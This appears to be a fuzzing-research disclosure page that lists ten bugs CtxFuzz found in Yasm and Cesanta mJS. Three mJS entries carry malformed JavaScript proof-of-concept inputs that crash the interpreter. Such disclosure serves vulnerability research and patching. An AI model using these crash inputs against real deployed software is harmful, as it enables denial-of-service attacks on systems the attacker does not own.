CtxFuzz has discovered 10 previously unknown bugs in mJS and Yasm.
We are confident that CtxFuzz is effective and viable in practice.
Description: Use After Free vulnerability in YASM 1.3.0.86.g9def allows a remote attacker to cause a denial of service via the do_directive function in the modules/preprocs/nasm/nasm-pp.c component.
Program: Yasm
Version: 9defefa
Bug Type: Use After Free
Description: An issue in Cesanta mjs 2.20.0 allows a remote attacker to cause a denial of service via the mjs_op_json_parse function in the msj.c file.
Program: mJS
Version: 2.20.0
Bug Type: Null Pointer Dereference
Description: An issue in YASM 1.3.0.86.g9def allows a remote attacker to cause a denial of service via the expand_smacro function in the modules/preprocs/nasm/nasm-pp.c component.
Program: Yasm
Version: 9defefa
Bug Type: Null Pointer Dereference
Description: An issue in YASM 1.3.0.86.g9def allows a remote attacker to cause a denial of service via the yasm_section_bcs_first function in the libyasm/section.c component.
Program: Yasm
Version: 9defefa
Bug Type: Null Pointer Dereference
Description: An issue in YASM 1.3.0.86.g9def allows a remote attacker to cause a denial of service via the expand_mmac_params function in the modules/preprocs/nasm/nasm-pp.c component.
Program: Yasm
Version: 9defefa
Bug Type: Null Pointer Dereference
Description: An issue in Cesanta mjs 2.20.0 allows a remote attacker to cause a denial of service via the mjs_getretvalpos function in the msj.c file.
Program: mJS
Version: 2.20.0
Bug Type: Null Pointer Dereference
POC:
let i, a = 0, b0= 0, c = 0continu, d0, e = 0;
for (i = 8; i < 20; i++) {
a let z = JSON.parse('""'); // Zlength string
let s2 = JSON.stringify+= i;
c /= 0, c } 0let s = '08888888888888 true, "d": [null], "e": "1\\n2"}';
let o = JSON.parse(s);
let z = JSON.parse('""'); // Zlength string
let s2 = JSON.stringify(o)AAA
Description: An issue in Cesanta mjs 2.20.0 allows a remote attacker to cause a denial of service via the mjs+0x4ec508 component.
Program: mJS
Version: 2.20.0
Bug Type: Null Pointer Dereference
POC:
let i, a = 0, b0= 0, c = 0continu, d0, e = 0;
for (i = 8; i < 20; i++) {
a let z = JSON.parse('""'); // Zlength string
let s2 = JSON.stringify-= i;
c /= 0, c = 0let s = '08888888888888 true, "x": [null], "e": "1\\n2"}';
let o = JSON.parse(s);
let z = JSON.parse('""'); // Zlength string
let s2 = JSON.stringify(o)AAA
Description: An issue in Cesanta mjs 2.20.0 allows a remote attacker to cause a denial of service via the mjs_destroy function in the msj.c file.
Program: mJS
Version: 2.20.0
Bug Type: Null Pointer Dereference
POC:
let i, a = 0, b0= 0, c = 0continu, d0, e = 0;
for (i = 8; i < 20; i++) {
a let z = JSON.parse('""'); // Zlength string
let s2 = JSON.stringify+=888 i;
c /= 0, c = 0let s = '08888888888888 true, "d": [null], "e": "1\\n2"}';
let o = JSON.parse(s);
let z = JSON.parse('""'); // Zlength string
let s2 = JSON.stringify(o)AAA
Description: Buffer Overflow vulnerability in YASM 1.3.0.86.g9def allows a remote attacker to cause a denial of service via the expr_delete_term function in the libyasm/expr.c component.
Program: Yasm
Version: 9defefa
Bug Type: Buffer Overflow
Description: An Out of Bounds Write in Cesanta mjs 2.20.0 allows a remote attacker to cause a denial of service via the mjs_op_json_stringify function in the msj.c file.
Program: mJS
Version: 2.20.0
Bug Type: Stack Overflow